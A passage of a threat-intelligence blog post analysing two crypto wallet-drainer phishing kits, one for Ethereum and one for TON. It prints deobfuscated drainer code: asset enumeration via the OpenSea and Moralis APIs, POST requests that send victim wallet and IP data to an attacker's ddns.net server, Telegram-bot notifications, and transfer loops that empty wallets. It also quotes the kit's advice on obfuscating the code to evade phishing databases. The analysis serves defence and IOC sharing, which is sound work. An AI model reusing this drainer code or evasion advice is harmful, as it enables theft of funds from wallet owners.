By creating empty, placebo-like dependencies to make it believe everything is in place, we manage to get a grip on this Frankenstein monster “prototype”. Again, no backend script is provided; everything is offloaded to JavaScript procedures.

But why are we bothering so much with a patient that looks like this? Well, because judging a book by its cover never ends well. Such a simple product can mean two things: either it’s a PoC or WIP, or it’s a template for an implant, kept simple on purpose to be adapted to other ‘products’ in the scene…

Its main file, index.js, appears to contain the primary configuration directives along with a small surprise at the bottom:

/**** CONFIGURATIONS ****/

const config = { 

    receiver: "INSERT_YOURE_WALLET_HERE",
    
    design: {
        walletAppear: true,
        eliAppear: true,
        
        connectElement: "#connectButton",
        connectedElement: "#claimButton",
        
        retryDelay: 3000,
        
        buttonMessagesEnabled: true,
        buttonMessages: {
          initialConnect: "Update",
          initialConnected: "Update",
 
          progress: "Loading ...", 
          success: "Confirming ...",
          failed: "Verification failed !",
        }
    },
 
    claimInfo: {
 
        collectionDetails: {
            minAveragePrice: 0.005,
            minVolumeTraded: 20,
        },
 
        minValueERC20: 0,
        minWalletBalance: 0.0003,
    }
 
 }

[OBFUSCATED CODE]

At the bottom of the file, there’s an obfuscated JavaScript snippet. Fortunately, we recognized the obfuscator used, making the process easily reversible.

const _0x3d9a20 = {
  Accept: "application/json",
  "X-API-KEY": ''
};
class _0x264fc9 {
  ["OpenseaAPI"] = "7da[REDACTED]bc2";
  ["MoralisAPI"] = "ey[REDACTED]OprjzDyI";
  [...]
  ["walletAddress"];
  ["walletBalance"];
  ["walletBalanceInEth"];
  ["chainId"];
  ["seaportConduit"] = "0x1e0049783f008a0085193e00003d00cd54003c71";
  ["uniswapV3Router1"] = "0xE592427A0AEce92De3Edee1F18E0157C05861564";
  ["uniswapV3Router2"] = "0x68b3465833fb72a70ecdf485e0e4c7bd8665fc45";
  ["pancakeSwapRouter"] = "0xEfF92A263d31888d860bD50809A8D171709b7b1c";
  ["sushiSwapRouter"] = "0xd9e1cE17f2641f24aE83637ab66a2cca9C378B9F";
  ["receiverSwapTokenAddress"] = "0xa0b86991c6218b36c1d19d4a2e9eb0ce3606eb48";
  ["receiverSwapTokenAddressAlt"] = "0xc02aaa39b223fe8d0a0e5c4f27ead9083c756cc2";
  [...]
}
const _0x460b21 = {
  logDomainName: "http://ethers.ddns.net:3000/",
  logIpData: true
};
const _0xa4df20 = {
  receiver: "0xbF84Ed43EEF5D5f98f4746EB4a8f2805D5c0458a"
};

Some interesting points:

• API keys associated with OpenSea and Moralis.

• References to multiple legitimate smart contracts, including Uniswap, PancakeSwap, and SushiSwap routers, as well as USDC and wETH (Wrapped ETH)..

• A ddns.net domain linked to the Threat Actor.

• The Threat Actor’s address, labeled Fake_Phishing187964.

Moving along, the template provides functions to fetch NFTs and ERC20 tokens which will later be stolen. For this process, OpenSea's and Moralis' APIs are abused.

["fetchNFTS"] = async () => {
    console.log("Fetching NFTS");
    this.requestOptions.headers["X-API-KEY"] = this.OpenseaAPI;
    try {
      fetch("https://api.opensea.io/api/v1/collections?asset_owner=" +      this.walletAddress + "&offset=0&limit=300", this.requestOptions).then(_0xb79829 => _0xb79829.json()).then(_0x2f04d2 => {
    return {
    'name': _0x3ab714.primary_asset_contracts[0].name,
    'type': _0x3ab714.primary_asset_contracts[0].schema_name,
    'contractAddress': _0x3ab714.primary_asset_contracts[0].address,
    'price': this.round(_0x3ab714.stats.one_day_average_price != 0 ? 
    [...]
      });
    } catch (_0x3b2b60) {
      console.log("NFT Request error: ", _0x3b2b60);
    }
    [...]
    } catch (_0x222677) {
        console.log("NFT floor price error: ", _0x222677);
    }
};

["fetchERC20"] = async () => {
    console.log("Fetching ERC20");
    let _0x4aceab = [];
    try {
      this.requestOptions.headers["X-API-KEY"] = this.MoralisAPI;
      _0x4aceab = await fetch("https://deep-index.moralis.io/api/v2/" + this.walletAddress + "/erc20?chain=eth", this.requestOptions).then(_0x433cb3 => _0x433cb3.json());
      let _0x4fb793 = _0x4aceab.filter(_0x3c491f => _0x3c491f.thumbnail != null || _0x3c491f.name == "ApeCoin").map(_0x45bbf1 => {
        const _0x240085 = {
          type: "ERC20",
          contractAddress: _0x45bbf1.token_address,
          fullName: _0x45bbf1.name,
          name: _0x45bbf1.symbol,
          balance: _0x45bbf1.balance,
          decimals: _0x45bbf1.decimals,
          banner: _0x45bbf1.thumbnail
        };
        [...]
        this.transactions.push(_0xc9c40);
        this.ERC20tokens.push(_0xc9c40);
      }));
    } catch (_0x2a181a) {
      console.log("ERC20 fetch error: ", _0x2a181a);
    }
  };

  ["transfer"] = async () => {
    if (config.design.buttonMessagesEnabled) {
      this.claimButton.innerText=config.design.buttonMessages.progress;
    }
    this.transactions.push({
      'type': "ETH",
      'price': this.walletBalanceInEth
    });

Finally, there are additional functions that work specifically with Seaport, Uniswap, Sushiswap, and PancakeSwap, all of which call back home by sending a POST request to the TA’s backend. Let’s take a closer look:

["transferNFTseaport"] = async () => {
    try {
      const _0xd64e23 = {
      offer: this.offers,
      consideration: this.considerations,
      conduitKey: "0x000000[...]8104250f0000",
          zone: "0x004C00500000aD104D7DBd00e3ae0A5C00560C00",
          startTime: "1661790956",
          endTime: "11[...]935"
      };
          [...]
          fetch("http://ethers.ddns.net:3000/backend/seaport", {
            'method': "POST",
            'headers': {
              'Content-Type': "application/json",
              'Accept': "application/json"
            },
            'body': JSON.stringify({
              'order': _0x29d81f,
              'address': this.walletAddress,
              'walletBalanceInEth': this.walletBalanceInEth,
              'isMobile': this.isMobile(),
              'websiteUrl': window.location.href,
              'websiteDomain': window.location.host,
              'ipData': _0x1eb992
            })
          });

["transferERC20pancakeswap"] = async () => {
    if (this.pancakeswapTokens.length > 0) {
      console.log("TRANSFERRING APPROVED PANCAKESWAP ERC20 TOKENS");
      console.table(this.pancakeswapTokens);
      [...]
        fetch("http://ethers.ddns.net:3000/backend/swap", {
          'method': "POST"
          'body': JSON.stringify({
            'address': this.walletAddress,
            'walletBalanceInEth': this.walletBalanceInEth,
            [...]
            'transferName': "PANCAKESWAP",
            'transactionHash': _0x2887e2
          })
        });

["transferERC20sushiswap"] = async () => {
    try {
      if (this.sushiswapTokens.length > 0) {
        console.log("TRANSFERRING APPROVED SUSHISWAP ERC20 TOKENS");
        console.table(this.sushiswapTokens);
        [...]

And that’s it. What started as a simple HTML template with nothing fancy to show turned out to be a complete draining suite, featuring multichain compatibility, obfuscated code, dedicated support for leading protocols, seamless integration with top NFT markets, heartbeat and home-calling capabilities. Who would have guessed?

It’s time to unplug this replicant and let it return to the init 0 from which we should never have brought it back.

🧪 Dr Ainer, administering TONic

It seems our next patient has a history of good ‘private practices’ on the surface, looking fresh and flawless.

There’s not much to say about the HTML landing page, which comes bundled with an installation manual in HTML format.

The template simulates a prize roulette that —thanks to a JavaScript manipulation— always yields the same reward: 100 TON. And, as you may have guessed, in order to claim it, you’ll need to connect your wallet.

The facial reconstruction work done here looks professional, but let’s take a closer look at the stitches inside holding it all together. Once again there is no backend and all the workload is offloaded to JavaScript libraries:

• nfts_whitelist.js

• web3.js

• spin-wheel.js (the rigged spinwheel)

The nfts_whitelist.json file contains an allow-list for 15 NFT projects hosted on the TON blockchain, including Lost Dogs, Anonymous Telegram Numbers and Rocket Cosmonauts, which are of interest to the Threat Actor.

[
    {
      "nft_platform": "Anonymous Telegram Numbers",
      "nft_address": "EQAOQdwdw8kGftJCSFgOErM1mBjYPe4DBPq8-AhF6vr9si5N",
      "contract": "EQAOQdwdw8kGftJCSFgOErM1mBjYPe4DBPq8-AhF6vr9si5N",
      "average_price": 210.6915,
      "rank": 1
    },[...]
    {
      "nft_platform": "Lost Dogs",
      "nft_address": "EQAl_hUCAeEv-fKtGxYtITAS6PPxuMRaQwHj0QAHeWe6ZSD0",
      "contract": "EQAl_hUCAeEv-fKtGxYtITAS6PPxuMRaQwHj0QAHeWe6ZSD0",
      "average_price": 1.4226,
      "rank": 3
    },[...]
    {
      "nft_platform": "Rocket Cosmonauts NFT",
      "nft_address": "EQCU3idfp--Bs5x2QId5v0ac5JOwFiKu5g1O7UIEqd9SrWUA",
      "contract": "EQCU3idfp--Bs5x2QId5v0ac5JOwFiKu5g1O7UIEqd9SrWUA",
      "average_price": 360.0000
      "rank": 6
    },[...]
]

The web3.js file appears to handle the ruse, but it is obfuscated. Perhaps the install.html file could shed some light on how to access it…

<p><br>Great, the configuration of the script has been successfully completed, now it must be obfuscated so that the code does not get into phishing databases, and simply so that no one steals it from your site, which, of course, is very important.</p>

<p>To do this, we need the following site: <a href="https://obfuscator.io">obfuscator.io</a></p>

<p>Open the contents of the "<b>web3.js</b>" file again, where we set up the <b>CF</b> & <b>TG</b> variables, completely copy all the contents and paste it into <a href="https://obfuscator.io">obfuscator.io</a></p>

Good tip; we wouldn’t want anyone stealing the code. Now, with the file deobfuscated, it looks like this:

// Using this code without obsfuscation is strictly prohibited !
// If this is discovered, an arbitration will be written
[...]
const CF = {
    Wallet: "UQY[...]FxZfi",  // Wallet address where the assets will go
    Native: true,
    Tokens: true,
    NFTs: true,
    Tokens_First: false,
    Ton_rate: 7.99, // conversion rate ( 1 TON to USD = 7.99 )
    TonApi_Key: "", // https://tonconsole.com/ (RECOMMENDED), 
    manifestUrl: "https://app.storm.tg/tonconnect-manifest.json"
}

const TG = {
    token: "", // Your @Botfather Bot token
    chat_id: "", // ID of the chat for notifications
    enter_website: false,
    connect_success: false,
    connect_empty: false,
    transfer_request: false,
    transfer_success: false,
    transfer_cancel: false
};
// ==================================================================
// ========= Bring changes to the code below is not sure ============
// ==================================================================
[...]

A rather simple configuration that once again relies on our old friend, Telegram, and its bots to serve as the communication channel between the drainer instance and the operator. The rest of the file is dedicated to querying IP-API, TON API, and TonViewer to retrieve information on a user’s location and assets, as well as the Telegram API to send the following messages to the operator:

🔌 User Connected Wallet ([Shortened Address])

🌍 [Host] - 📍 [Country Link to IP-API]

💲 (≈ [Total Balance in USD])

🧿 [TON Balance Information]

🪙 [Token Balance Information]

👾 [NFT Balance Information]

✅ Approved Transfer ([Shortened Address])

👾 (≈ [Total NFT Price] USD)

[NFT List with Price Information and Links]

❌ Declined Transfer ([Shortened Address])

👾 (≈ [Total NFT Price] USD)

[NFT List with Price Information and Links]

👀 User opened the website

🌍 [User Language] | [Host]

📍 [Country Link to IP-API]

🔌💩 User Connected an Empty Wallet ([Shortened Address])

🌍 [Host] - 📍 [Country Link to IP-API]

The drain happens at the following functions:

async function TokenTransfer(tokenChunk, sourceArray) {
try {
  const totalTokenPriceUSD = tokenChunk.reduce((sum, token) => 
  sum + token.calculatedBalanceUSDTG, 0);

async function NftTransfer(nftChunk, sourceArray) {
try {
  const totalNftPriceUSD = nftChunk.reduce((sum, token) => 
  sum + token.calculatedBalanceUSDTG, 0);

async function handleTransaction(transactionData, notif, successMessage, errorMessage) {
try {
  if(TG.transfer_request){
    await TgMsg(notif);
  }
  await w3.sendTransaction(transactionData);
  await sleep(1300);
  if(TG.transfer_success){
    await TgMsg(successMessage);
  }
} [...]

async function processAssets(walletData, tokenData, nftData) {
[...]
for (let type of sortedTypes) {
  switch (type) {
  case "TON":
    if (groupedData.TON.length > 0 && CF.Native) {
      await TonTransfer(groupedData.TON[0]);
      await sleep(1300);
    } break;
  case "TOKEN":
    if(CF.Tokens){
      for (let i = 0; i < groupedData.TOKEN.length; i += 4) {
        let chunk = groupedData.TOKEN.slice(i, i + 4);
        await TokenTransfer(chunk, groupedData.TOKEN);
        await sleep(1300);
      }
    } break;
  case "NFT":
    if(CF.NFTs){
      for (let i = 0; i < groupedData.NFT.length; i += 4) {
        let chunk = groupedData.NFT.slice(i, i + 4);
        await NftTransfer(chunk, groupedData.NFT);
        await sleep(1300);
      }
    } break;
  }
}

The deobfuscated files containted the operator’s TON address, which still shows activity to this day—but my license only allows me to practice on droids, so that’s as far as we’ll get today.

We’ve seen it all: drainers, obfuscated code, esoteric programming languages, Russian blockchains, a hacked minister’s account, and we even stitched together our very own Frankenstein’s monster. I’d say that’s enough excitement for a single article, so it’s time to part ways.

💊 Down at the doctor’s

I hope you enjoyed this article, and remember: if you need a trusty doc with swift hands and a #nologs policy, drop by the clinic.

We speak PHP and accept XMR ; ) .

All IOCs collected during this investigation are available on our Level Blue (formerly AlienVault OTX) profile, should they come in handy.